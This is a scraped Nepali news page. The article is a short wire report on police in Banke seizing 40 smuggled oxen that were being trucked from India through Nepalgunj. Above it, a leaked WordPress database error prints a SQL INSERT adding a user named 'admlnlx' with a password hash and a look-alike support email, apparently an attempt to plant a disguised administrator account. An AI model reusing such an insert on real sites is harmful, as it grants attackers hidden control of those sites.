WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/8k47rNp5HLxaDtJ5Nnarzq5a93gg/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 06:50:38', '', 'admlnlx', 'admlnlx')
बाँके, माघ ९ –
भन्सार छलेर भारतबाट अवैध रुपमा नेपालगन्ज भित्र्याइएका गोरु नेपाल प्रहरीले आइतबार बरामद गरेको छ । जिल्ला प्रहरी कार्यालय बाँकेका अनुसार नेपालगन्ज हुँदै सर्लाही लैजान ट्रकमा राखिएका ४० वटा गोरुलाई राझाचोकबाट बरामद गरिएको हो ।
अनुसन्धानका क्रममा ती गोरु हेटाैडा—८ मकवानपुर निवासी लुम्बिनी सप्लायर्सका आशाराम श्रेष्ठको रहेको खुलेको छ । प्रहरीका अनुसार भारतबाट गोरु ल्याएर बंगलादेश पठाउन अहिले संगठित गिरोह नै तयार भएको छ । – रासस